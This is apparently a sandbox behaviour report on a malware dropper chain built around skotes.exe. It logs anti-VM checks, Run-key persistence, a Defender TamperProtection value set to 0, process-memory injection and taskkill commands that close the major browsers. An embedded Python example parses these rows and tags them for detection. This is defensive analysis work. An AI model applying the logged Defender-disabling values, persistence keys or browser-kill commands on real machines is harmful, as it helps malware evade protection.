Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\834d52b622.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012619001\\834d52b622.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\24b798a9da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012620001\\24b798a9da.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4d29df7d32.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012621001\\4d29df7d32.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c931428444.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012622001\\c931428444.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
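The registry rows in the signature tables above (the Defender Real-Time Protection policy values and the TamperProtection feature flag set by c931428444.exe, the VBOX__ ACPI key and Software\Wine probes, the SystemBiosVersion/VideoBiosVersion queries, and the Run keys written by skotes.exe) all share one row layout: operation, indicator, acting process, target. The Python below is an added example, not part of this report or of the sandbox's own tooling. It parses rows in that layout into records, normalises the kernel object paths to HKLM/HKU form, and tags each acting process with the behaviours the rows document. SAMPLE_ROWS is a constructed subset copied from the tables above; the RegEvent class, the normalise/parse_rows/classify/analyze functions and the rule names are this example's own.

```python
"""Parse sandbox registry rows and tag the behaviours they document.
Added example; not the report's or the sandbox's own tooling."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: one row per behaviour, copied from the signature tables above.
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c931428444.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012622001\\c931428444.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
"""
# Row layout: <operation> <indicator> <acting process> <target>. Indicator and process
# path may both contain spaces, so the process is the last "C:\..." token before N/A.
ROW = re.compile(
    r"^(?P<op>Set value \((?:int|str)\)|Key created|Key opened|Key value queried)\s+"
    r"(?P<indicator>.*)\s+(?P<process>C:\\.*?)\s+N/A$"
)
SET_VALUE = re.compile(r'^(?P<path>.*?) = "(?P<data>.*)"$')
USER_HIVE = re.compile(r"^\\REGISTRY\\USER\\S-1-5-21-[\d-]+\\", re.IGNORECASE)
MACHINE_HIVE = re.compile(r"^\\REGISTRY\\MACHINE\\", re.IGNORECASE)

@dataclass
class RegEvent:
    op: str
    key: str         # normalised key (HKLM\... or HKU\..., WOW6432Node removed)
    value_name: str  # empty for key-level operations
    data: str        # empty unless op is a Set value
    process: str

def normalise(path: str) -> str:
    """Kernel object path -> hive-prefixed path, WOW64 redirected view dropped."""
    path = USER_HIVE.sub(r"HKU\\", path)
    path = MACHINE_HIVE.sub(r"HKLM\\", path)
    return path.replace("WOW6432Node\\", "")

def parse_rows(text: str) -> list[RegEvent]:
    events: list[RegEvent] = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        op, indicator, data = m["op"], m["indicator"], ""
        if op.startswith("Set value"):
            sv = SET_VALUE.match(indicator)
            if not sv:
                continue
            indicator, data = sv["path"], sv["data"]
        key, value_name = normalise(indicator), ""
        if op.startswith("Set value") or op == "Key value queried":
            key, _, value_name = key.rpartition("\\")
        events.append(RegEvent(op, key, value_name, data, m["process"]))
    return events

# Rule names below are this example's own, not sandbox signature names.
RTP_VALUES = {"DisableRealtimeMonitoring", "DisableBehaviorMonitoring",
              "DisableIOAVProtection", "DisableOnAccessProtection",
              "DisableScanOnRealtimeEnable"}

def classify(ev: RegEvent) -> str | None:
    key = ev.key.lower()
    if ev.op.startswith("Set value"):
        if (key.endswith(r"policies\microsoft\windows defender\real-time protection")
                and ev.value_name in RTP_VALUES and ev.data == "1"):
            return f"defender_rtp_disabled:{ev.value_name}"
        if (key.endswith(r"microsoft\windows defender\features")
                and ev.value_name.lower() == "tamperprotection" and ev.data == "0"):
            return "defender_tamper_protection_off"
        if key.endswith(r"\microsoft\windows\currentversion\run"):
            target = ev.data.replace("\\\\", "\\")  # report escapes backslashes in string data
            return f"run_key_persistence:{ev.value_name}->{target}"
    if ev.op == "Key opened":
        if key.endswith(r"hardware\acpi\dsdt\vbox__"):
            return "anti_vm:virtualbox_acpi"
        if key.endswith(r"\software\wine"):
            return "anti_vm:wine"
    if (ev.op == "Key value queried" and key.endswith(r"hardware\description\system")
            and ev.value_name.lower() in {"systembiosversion", "videobiosversion"}):
        return f"anti_vm:bios_{ev.value_name.lower()}"
    return None

def analyze(text: str) -> dict[str, list[str]]:
    """Map each acting process to the distinct behaviours it showed, in row order."""
    findings: dict[str, list[str]] = defaultdict(list)
    for ev in parse_rows(text):
        tag = classify(ev)
        if tag and tag not in findings[ev.process]:
            findings[ev.process].append(tag)
    return dict(findings)

if __name__ == "__main__":
    for process, tags in analyze(SAMPLE_ROWS).items():
        print(process, *tags, sep="\n    ")
```

Two practical points. The rows carry the WOW6432Node prefix because the writers are 32-bit processes, so the rules match on the key suffix rather than on the full path and therefore fire for either registry view. And the Defender rows record what c931428444.exe tried to write; whether the policy values take effect depends on the Tamper Protection state of the host, which the report does not capture, so treat the tags as intent rather than as a confirmed Defender configuration.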

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1388 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1388 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1388 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4396 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe
PID 4396 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe
PID 4396 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe
PID 4396 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe
PID 4396 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe
PID 4396 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe
PID 4396 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe
PID 4396 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe
PID 4396 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe
PID 4396 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe
PID 4660 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe

"C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe

"C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe"

C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe

"C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 800 -ip 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 800 -ip 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 1484

C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe

"C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe"

C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe

"C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

